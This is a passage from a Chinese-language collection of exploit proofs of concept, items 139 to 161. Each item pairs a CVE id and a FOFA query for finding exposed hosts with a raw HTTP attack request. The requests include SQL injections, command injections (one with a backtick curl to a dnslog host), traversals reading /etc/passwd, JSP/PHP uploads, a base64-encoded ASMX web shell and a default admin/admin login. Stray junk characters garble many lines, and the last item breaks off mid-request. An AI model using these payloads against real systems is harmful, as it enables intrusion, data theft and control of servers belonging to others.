: L" h `& b1 G; k139. 福建科立讯通信指挥调度平台editemedia.php sql注入
; E8 p7 Z* q3 A9 XCVE-2024-2622, k T" f- ?# U6 e/ s
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 Y" z7 y) B. KGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.11 x% A4 ]4 k8 t0 t
Host: x.x.x.x1 l& N& j! f7 Y1 X& ]2 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
6 v& \, ~& K3 y- Q yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% T0 ]' R! M- D5 I, S% v! M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 a8 f7 w0 `1 ?0 i
Accept-Encoding: gzip, deflate, br$ F+ d3 n6 e) V0 n
Connection: close) \1 n5 S( t( p! _& Z$ z
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk6 f: N* K; [% @6 j O5 K9 t8 d3 A
Upgrade-Insecure-Requests: 1
% G* Q- {: e+ o" b
! l0 V) r& z& k* C/ z! K- J$ ]7 x8 L% ~
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入# s/ f- q( X7 A! x! I
CVE-2024-2566
3 R9 C; K W. wFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" X: v ?6 l* g: Q& `$ U4 BGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
0 D: m1 Z" p9 z. n7 jHost: x.x.x.x9 P# I$ q* @2 o0 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ T0 O4 q. b( B1 Q4 B: G& ]! Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& s- O) Y# m4 z' n) _( e, fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- {/ W# C5 c# e* X4 S* R, R! ~
Accept-Encoding: gzip, deflate, br
# u2 |' C, a j5 j: g7 `: q* F7 {: UConnection: close& J* j& x8 ?" c4 b
Cookie: authcode=h8g9
# w/ l7 x! P+ q c. PUpgrade-Insecure-Requests: 1
" _& k3 \8 u; Z+ v# x( M: e( I: Z1 U3 B! l1 y W4 i
- `3 y. P* k" C. I8 `0 s/ r/ I& E
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 O% F; }: m5 }/ E& k2 c
FOFA:body="指挥调度管理平台"
) x. m. E6 q( g9 CPOST /app/ext/ajax_users.php HTTP/1.1& Z9 b+ m% L1 V5 O, I: s# g% X
Host: your-ip
! d1 a# x. X: e- W4 _User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+ R+ h5 ?# L0 I) g0 `, xContent-Type: application/x-www-form-urlencoded. E n; D$ C/ r7 \ ~
5 a6 a) O) r9 ]. `3 o$ [* _9 c4 w, O
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
: i1 k2 P4 |2 U1 n! e j. w
& y4 }+ a) p9 L6 C/ w1 z& h0 f4 Y' s/ }
142. CMSV6车辆监控平台系统中存在弱密码 L( \: X3 Z h2 F
CVE-2024-29666
0 u- X$ d5 Q+ N9 C1 w2 N, N. sFOFA:body="/808gps/"
( r9 Y7 z" i* n6 eadmin/admin7 `0 u9 a( o) m/ x
143. Netis WF2780 v2.1.40144 远程命令执行) s. Q/ w* I; I# Q1 d' U
CVE-2024-25850% v$ X# f! {5 ^( E }
FOFA:title='AP setup' && header='netis'
8 l3 b+ e$ S+ T2 Q: OPAYLOAD
8 t5 D1 b2 }# F- a$ B4 H3 }6 ~# _+ G! t6 S, l; @( S
144. D-Link nas_sharing.cgi 命令注入
) l9 I+ i5 `+ a& a1 TFOFA:app="D_Link-DNS-ShareCenter"
# W P$ A, |- f0 U! M% m& a! xsystem参数用于传要执行的命令* `) h Y2 B3 `6 S
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1, n$ H- t! m3 P" j, J3 `7 n2 z
Host: x.x.x.x% h6 m. V+ }1 g8 o
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
0 ^# B4 {6 i" U* `6 t( h8 ^Connection: close
. f! T6 a* r2 ^; l- ]9 d# \Accept: */*
) M; X2 b: f' {% N% UAccept-Language: en
9 \. \& k$ Q' d' [Accept-Encoding: gzip
/ \6 h4 f, t6 r2 B- b$ h6 K' \
' W9 k. Q- q& z. R
4 U6 p6 H$ b5 F" l/ T6 S145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, P9 t" v7 L3 v/ ~" F9 A1 I
CVE-2024-3400
* P% @" l! x' M3 w# {$ T7 ~FOFA:icon_hash="-631559155"
. c5 e/ K# V4 r9 v7 u q3 JGET /global-protect/login.esp HTTP/1.1. i! c {! ~* u; c
Host: 192.168.30.112:1005
0 Y3 D( z6 V' T5 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
0 H) x4 n9 {% A& MConnection: close# `' v3 |. r8 k# ^$ N6 p* l
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;. b. S5 o J5 |0 X$ o
Accept-Encoding: gzip7 y" u$ R3 F! g5 d5 ]- g3 g
9 M4 _3 y# x2 m) e+ z+ B K
$ m+ V: e" K+ g
146. MajorDoMo thumb.php 未授权远程代码执行- k4 |4 L' v. z4 A( T4 D: K- U, Z
CNVD-2024-02175
/ `0 u7 n; l/ F* x' J( T0 HFOFA:app="MajordomoSL"
9 _6 `/ g% v. N& {9 KGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
1 Y2 q4 C1 N, `Host: x.x.x.x
6 @7 a! t! Q6 O$ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
3 p+ ?& l( o8 U3 C" \: QAccept-Charset: utf-8
, [' X4 B+ Y- _; p' K+ s) UAccept-Encoding: gzip, deflate
2 ~- }7 U$ X# s2 i h- n. p/ RConnection: close: P0 O1 t' O2 m# [8 S6 i
, l- m. }0 x1 U/ R; M
- G; A5 o- a9 B+ @. B! \5 k147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
3 G' r0 n7 z4 m# n9 H! c& WCVE-2024-32399
- g! U; @4 `% B- U+ A) r3 dFOFA:body="RaidenMAILD"
3 Q( w2 [) n6 EGET /webeditor/../../../windows/win.ini HTTP/1.1
8 c: ~1 `/ F7 I" i9 eHost: 127.0.0.1:81
# @: B/ s$ E6 X+ d) f, n) BCache-Control: max-age=09 K% S+ M: S, J7 {' m5 C' ^5 j
Connection: close6 y! x0 b1 V5 a! c5 U( }2 y. T
+ `1 P4 K, ]8 K3 R# k# L& A; W& H6 y
% J, X# B! G- z. W. ~148. CrushFTP 认证绕过模板注入1 g' G* a# V" W) j2 O. ~. m
CVE-2024-40406 C0 n+ w) T# ~# G" G1 D) S" i3 |' I
FOFA:body="CrushFTP" }- }, U2 _* h) I+ n: K* F
PAYLOAD4 q; G+ P7 p* Z$ B
) A( W: m* l: `* y2 j- V
149. AJ-Report开源数据大屏存在远程命令执行3 W) T1 H: G% L5 P3 `/ h: J+ s
FOFA:title="AJ-Report"
' y" N! R4 x t: A4 F7 e6 X, D6 U$ C
0 Z( c {1 k" K; U. oPOST /dataSetParam/verification;swagger-ui/ HTTP/1.18 y$ N6 |3 u0 E& R
Host: x.x.x.x: u4 v. l$ `" j" r' l4 _4 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( J) b. ^6 \0 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 n3 {% P4 @. R# t1 R nAccept-Encoding: gzip, deflate, br: l, S- v+ f) {' U' b
Accept-Language: zh-CN,zh;q=0.93 q6 ]2 f2 }8 w4 k
Content-Type: application/json;charset=UTF-8
9 J) H2 n" {3 m; T+ _/ tConnection: close
/ X. K; `: | y
$ q/ r, {' I1 m4 G# n( Y{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
3 G& P( Z' g" m1 X9 U; l j6 _8 H; D/ P* R. ?6 p) o) j3 @
150. AJ-Report 1.4.0 认证绕过与远程代码执行6 e. X. R! A, d+ j: |" D
FOFA:title="AJ-Report"
& M) h3 a9 N! u' ^ M$ FPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1" N8 ?* y$ p/ k2 {& G
Host: x.x.x.x
' ^, A7 ^& I& P9 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 \; s1 h1 }/ Y, o0 L/ |/ l6 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! U, B- O: }: l" i+ @Accept-Encoding: gzip, deflate, br
) R3 J) h* i# Z2 x3 Y# @& u" m2 mAccept-Language: zh-CN,zh;q=0.9
, M6 l* U' O9 u8 t! }Content-Type: application/json;charset=UTF-85 H2 ?9 k9 T6 y4 a0 O7 }. `
Connection: close- a% j% s. H4 w/ E' R
Content-Length: 3392 X+ r0 x3 l1 {! Q% [! V
4 E7 ^. g7 I( }! O: p. w9 n
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}6 `1 q1 D: { K+ T1 U
' ~! l0 h9 k2 @# R4 l
1 h. x. H" T6 c6 B- ]151. AJ-Report 1.4.1 pageList sql注入
" ^( y7 {8 ^% Z# tFOFA:title="AJ-Report": e) A% |# @) a4 R
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
, \! v* C- a, m+ r% X+ ?Host: x.x.x.x
. K# R8 K9 _4 c" p0 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 m$ i' i& B( ]
Connection: close
* E, h, b5 _/ G! w' FAccept-Encoding: gzip
9 h! @1 p- z9 A) Q; _- r$ ?
) [$ E' I/ Q0 ~0 h1 T2 X7 z& X
0 i. N2 N: g5 u e1 V152. Progress Kemp LoadMaster 远程命令执行
3 e7 q3 H6 v0 tCVE-2024-12126 w. T( @ s* S
LoadMaster <= 7.2.59.2 (GA)
) V% P) Z7 J' h2 \& [LoadMaster<=7.2.54.8 (LTSF): m4 ~2 N$ H% n1 `# f2 O0 @2 u
LoadMaster <= 7.2.48.10 (LTS)
! V6 n- A8 P+ \% j1 DFOFA:body="LoadMaster"5 ], @6 D& `% t
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
- {9 J o& o6 f' i& \0 PGET /access/set?param=enableapi&value=1 HTTP/1.1
: b* Q' `9 V: J! sHost: x.x.x.x
/ Y" J+ ]/ }2 m% {6 y% {" T) l1 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.14 f# x2 l" \* r/ A) a
Connection: close) X- P! R* Y: o; q6 M8 `& O
Accept: */*- Y0 l8 R2 S& Z: C" a' `& h$ x
Accept-Language: en
+ S% z7 R. s9 V& Q1 h% t, r: jAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
2 L6 N0 @4 n- D& F& v' t3 }% t7 [Accept-Encoding: gzip' _7 ~0 t7 D% k9 K8 R' a" w/ Q
4 I. `, }1 a2 f6 x0 `" T0 e6 O& b6 {* a2 J$ t
153. gradio任意文件读取' P4 U9 F: r% C- z) {, O
CVE-2024-1561FOFA:body="__gradio_mode__"
8 s/ b* _/ o% b! d2 J, b1 x5 m第一步,请求/config文件获取componets的id
* w8 m+ c7 u. x+ a) ], N, J0 Ehttp://x.x.x.x/config
/ ]& e5 D: A( X/ ~4 J7 \( x, R; d
0 ~+ v2 v6 @0 i1 |+ i1 I) _9 w2 `9 G
第二步,将/etc/passwd的内容写入到一个临时文件2 a4 j% ?* z" @, a* x# M1 v( q
POST /component_server HTTP/1.1- c7 h! h! u' T
Host: x.x.x.x
- Y9 A9 ~/ p9 l1 ^8 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
9 w$ B8 V& C w5 k1 v8 {: fConnection: close' h& ^4 x3 p% E2 A" R) i2 @- v
Content-Length: 115 }- g9 k; U: E2 H
Content-Type: application/json6 o6 y8 L% h7 R2 u& K. Y
Accept-Encoding: gzip
3 l& O. a# V* b6 B. r2 t3 u3 R4 }
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
5 u2 F+ y0 h G4 V2 Z% z% w) [7 ]* y
; y! C/ h% V: Z第三步访问1 ^6 ~1 Y7 ]+ T P
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
3 g4 _5 P( L4 {5 O7 z; \5 e& r
) D, Z+ R: p! l0 ^/ V, R6 o6 ^% P0 z& \8 e
154. 天维尔消防救援作战调度平台 SQL注入
& a- p3 @, F @- r. g' E; GCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
4 `7 |( @1 O9 ^. E+ w0 Q0 X7 N4 BPOST /twms-service-mfs/mfsNotice/page HTTP/1.19 q8 a/ Q" d# D5 W* m- p2 t, V
Host: x.x.x.x t, _, d3 ?' `% Y* s& ]% I
Content-Length: 106
1 j8 i0 Y! x' {7 v/ T9 b JCache-Control: max-age=0
3 G" \2 y9 k( \7 ^Upgrade-Insecure-Requests: 16 S% f" n) A* w
Origin: http://x.x.x.x
4 h( S& m& B) ~. u; [ S& LContent-Type: application/json
0 N2 b) G1 I( `7 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
1 U# g5 I& y( m) {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( n6 M! ~( L' U3 I% O3 N0 HReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
) O o$ H: G3 R: KAccept-Encoding: gzip, deflate5 p/ J8 N1 l# m {
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7( {3 \8 M. c$ p
Connection: close( T8 G o4 w5 p/ u, d7 f+ f! r
3 K9 {* s- U, c# v; z R{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}$ C- G+ s9 U& O+ C# b" Z* b
& u+ l( f- s8 E1 J) i/ @0 h
7 V1 E, j! O/ Y* |0 A155. 六零导航页 file.php 任意文件上传9 z+ g6 b1 T. b2 W
CVE-2024-34982# d; d$ M, p d+ f; l
FOFA:title=="上网导航 - LyLme Spage"1 |" T4 k" C- n" z4 j% d. o( p
POST /include/file.php HTTP/1.1
1 i) W, Z9 h/ w3 b0 vHost: x.x.x.x5 w# n9 K- S( s1 v9 X7 r+ h. ]; {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.09 S8 I" N4 A1 i# ~) e
Connection: close
& m ]( o& w- r( X* ]; }" \Content-Length: 232
, K# W. I# {4 R' B2 g3 N$ i1 S xAccept: application/json, text/javascript, */*; q=0.017 a: `+ h) v+ t) S; G- q
Accept-Encoding: gzip, deflate, br) w6 f' w. G8 `" Y3 p# L' N6 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ M9 n- ?% Q- h( S* CContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
. E4 R7 o) L7 Z2 ?& G! cX-Requested-With: XMLHttpRequest/ U5 l3 G& t+ X$ L
! [& Q8 n+ g+ B6 E `( o2 @
-----------------------------qttl7vemrsold314zg0f
' ~# d( N* R1 N& qContent-Disposition: form-data; name="file"; filename="test.php" b+ e) F% r3 s0 A; o
Content-Type: image/png' r" x9 @8 E: U: p2 j
7 Z) |: ?. T, L3 a' ?& ^6 y9 O<?php phpinfo();unlink(__FILE__);?>
9 @3 A$ x S4 }1 @-----------------------------qttl7vemrsold314zg0f--
. j& o# L" n1 K8 U1 o7 O+ w3 _( G/ d$ y" c4 Z4 R4 l9 F
8 [6 I; q: u4 N( j" T& }' U
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
9 ]- e& o" O7 d9 V$ D& j
6 \: R/ S# p2 s! f156. TBK DVR-4104/DVR-4216 操作系统命令注入5 |+ O9 u2 E$ R
CVE-2024-3721
6 ]& I- S1 {* ~8 u i1 nFOFA:"Location: /login.rsp"4 S/ y( U% Q, b9 K/ b U
·TBK DVR-4104
0 W N+ |, v) A2 S; b·TBK DVR-4216
" W5 O( L. R* k: x1 Fcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
; X% M9 ~; ~9 ^. h4 D6 a Z; B, Z
6 F' j3 `( z# v8 b8 \ B; T: I
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.11 R; X& a2 }1 E# V: V
Host: x.x.x.x
% `) v3 X$ p! _+ \2 Y& HUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) p. O5 E' P. {/ k5 n* s
Connection: close; U% D+ z' Y+ B& z
Content-Length: 0
5 i( Y1 V* ~0 r8 cCookie: uid=1" H" O+ q7 V- ^ u
Accept-Encoding: gzip
4 E/ T$ y& U3 Y4 ~, P7 _
* b; ~; H' t6 z( }, }1 v( ]+ P/ R4 g+ {7 s
157. 美特CRM upload.jsp 任意文件上传
% O2 I0 C0 E, e; @( N4 |3 p- CCNVD-2023-06971; k2 C4 g# _* z5 D6 Q. O
FOFA:body="/common/scripts/basic.js". g1 p0 H/ `: r8 h: R
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1' \. N$ G0 i' A- E# b3 J1 j
Host: x.x.x.x" F% s; m2 S6 L# ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 }1 x; x+ A, T; t, _. @8 V4 z; Y2 K
Content-Length: 709
2 B# d, v3 M6 Q, a; vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 i4 h' b) H3 w( g6 T8 ~( U: SAccept-Encoding: gzip, deflate, q+ d5 m/ i: v: r, b+ \5 u
Accept-Language: zh-CN,zh;q=0.9
3 C0 |1 g7 r) n4 T. ?Cache-Control: max-age=04 E( U& ^7 P, w3 P6 A! x9 `" Y
Connection: close) G ^, Z" i0 N0 n3 R$ \0 k1 Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN4 m7 T- x! @; {
Upgrade-Insecure-Requests: 1% i1 ^( Z; f6 ?1 X1 e C
z. E# n8 y2 P9 ~* ^------WebKitFormBoundary1imovELzPsfzp5dN3 }7 K' }( w7 z w/ e* ~6 `
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"* {1 w' j+ @. v! g5 r. B
Content-Type: application/octet-stream. k: p2 T4 K( U3 a, G$ R8 I& T
4 w' ~) F$ D0 T4 ^
nyhelxrutzwhrsvsrafb0 J& V1 r% t- ]6 f9 T
------WebKitFormBoundary1imovELzPsfzp5dN& g: w5 n$ H: Y/ O1 T" h: S
Content-Disposition: form-data; name="key"
* c2 d, b4 p- S1 e3 _( g |* H9 O; I
null3 X# t' U) \3 _' Y3 M3 p
------WebKitFormBoundary1imovELzPsfzp5dN
9 c6 @. t/ U/ x: \& _! eContent-Disposition: form-data; name="form"4 S8 z% w& y ^- h6 `8 {
& c6 a; K0 d1 m/ O" ]* Unull
) K. Y% [3 w$ f. T: L* q+ x------WebKitFormBoundary1imovELzPsfzp5dN" R5 w/ p ?' i4 I
Content-Disposition: form-data; name="field"
1 D3 C! j9 H: V+ }) _
% t3 f5 J: G5 f: e7 L6 Y$ E" |null
6 }% a' o' b: T' _. B------WebKitFormBoundary1imovELzPsfzp5dN
6 j. \0 [8 r XContent-Disposition: form-data; name="filetitile": X/ t D$ _& Q, `' K* z
1 v# l5 Q8 z. unull
6 c. \9 P& C% w* N( x1 _2 p------WebKitFormBoundary1imovELzPsfzp5dN
0 f$ r8 b" y6 G) M1 DContent-Disposition: form-data; name="filefolder"
' ~3 |0 Y0 k1 x. Q i( c+ B2 [0 R- V
null
4 d" f% o2 {3 h7 u S------WebKitFormBoundary1imovELzPsfzp5dN--" R5 X- H) j; L
% ]- E2 i! |( S* u! _" H
% I# R8 o9 `% A& s, E/ g) L: z5 q
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
# H |. q8 l0 t7 n+ P6 v" W$ H8 n2 V1 W+ k+ T
158. Mura-CMS-processAsyncObject存在SQL注入; h$ m% }# ]& ~2 |
CVE-2024-326401 V! a$ K8 N4 f3 N2 L
FOFA:"Generator: Masa CMS"
3 {* A/ }& N! L4 w$ `* a; a4 oPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.18 N9 i. A8 A8 r* i0 ?
Host: {{Hostname}}. M$ D5 N/ k0 \7 ^, j. _' M
Content-Type: application/x-www-form-urlencoded# I# F" d2 B7 M" `. \9 n+ X
$ K# ~2 g* r# H' bobject=displayregion&contenthistid=x\'&previewid=1
( j* V0 T$ [- T0 ~6 ]$ Y9 u6 {+ O- m- v- `& ^* x2 y5 k6 R
8 I2 t8 z% }1 H# U+ Y- C2 b
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
8 p/ B6 [% c! K" n8 W2 L V1 ?! V$ \FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928") @4 R: H1 i, |9 m: ]; B8 O
POST /webservices/WebJobUpload.asmx HTTP/1.1+ b$ h w: B. p
Host: x.x.x.x$ |8 W. o: ?* C6 e4 q d" \) e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
4 ^" ~, o/ P. R OContent-Length: 1080
$ b6 j- D5 X W0 s% L. eAccept-Encoding: gzip, deflate3 U- k; {- i: ? r1 Y
Connection: close7 S# H8 D& v6 ~" t& O1 e3 Z0 {
Content-Type: text/xml; charset=utf-8+ g0 K. N4 W" S% l8 r3 M# h( F
Soapaction: "http://rainier/jobUpload"
* `3 ~# F+ g/ A3 k0 u! X T# L$ E6 N- i2 p7 T
<?xml version="1.0" encoding="utf-8"?>
6 I, @, s5 u6 H+ U" j$ D<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
L- A. v- C7 W; S( A* J0 n: _<soap:Body>
% d8 i/ J; v1 {+ Q' I<jobUpload xmlns="http://rainier">
$ P3 E' W0 d r) ^<vcode>1</vcode>
* E: H7 y7 \/ T<subFolder></subFolder># M0 F' Q) J$ y! w2 u7 I
<fileName>abcrce.asmx</fileName>
r/ j: }* u: q. b6 B& @5 [<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
4 U$ w8 G9 |4 B) O$ A4 n</jobUpload>1 W! I' E0 U; G& b" f0 n
</soap:Body>
; K5 ~- c' A4 o. P' H</soap:Envelope>9 s* K6 S6 @. I. L6 ]+ @
( J9 v0 z% j) G5 ^9 X7 S: q! T5 _8 F6 o: U4 i) k) Z
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")2 I1 @6 A K ~. _
( c/ t1 S, y* I
" h$ Y0 Q. g5 X2 s4 J
160. Sonatype Nexus Repository 3目录遍历与文件读取
% l; }9 \, d9 B5 T6 e* `CVE-2024-4956& }5 {* w6 d: }2 L; c
FOFA:title="Nexus Repository Manager"
' J/ ?$ [3 a+ {" i4 |& p! oGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 j) {) i2 m6 Q3 \
Host: x.x.x.x2 K z& v' a$ e3 r
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0- f3 G' a0 ^- x7 F4 M) \6 C- W
Connection: close0 n: p1 t; n0 a
Accept: */*5 @) j% {% f1 u3 v6 N5 t
Accept-Language: en
( M3 P7 c. Y' C% I. bAccept-Encoding: gzip! ?! \* t' j: p3 A2 j( e) d
1 s; Y3 b2 K: c/ b
5 K7 E9 _1 E w& g9 T161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 T2 i( b5 y h3 V. U, r8 F# ?1 h! zFOFA:body="/KT_Css/qd_defaul.css"8 Z1 N6 b, k7 |6 }0 e. S6 J. e8 _, S# o
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密- l. o1 I$ S! S% W0 w- h
POST /Webservice.asmx HTTP/1.1' i5 A" M9 R8 w: v1 H3 A; z K
Host: x.x.x.x3 k+ g. i, S1 r) B# }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
! p3 a. D$ D6 O D# RConnection: close
5 E1 {" E0 ~' v& GContent-Length: 445
, L0 D5 s" U5 uContent-Type: text/xml4 `) { h* Z9 ?) k3 s6 t
Accept-Encoding: gzip, K, z2 I4 d! j) D1 P& e3 R+ d
/ l( ]" t! E+ O; t5 R) a$ E<?xml version="1.0" encoding="utf-8"?># v) ^2 B; A$ [$ _% {7 ~2 ^. U' \
<soap:Envelope xmlns:xsi="3 B2 o$ t5 u* [- V9 d
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"8 [. x4 }7 d" Q$ X$ O& _
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
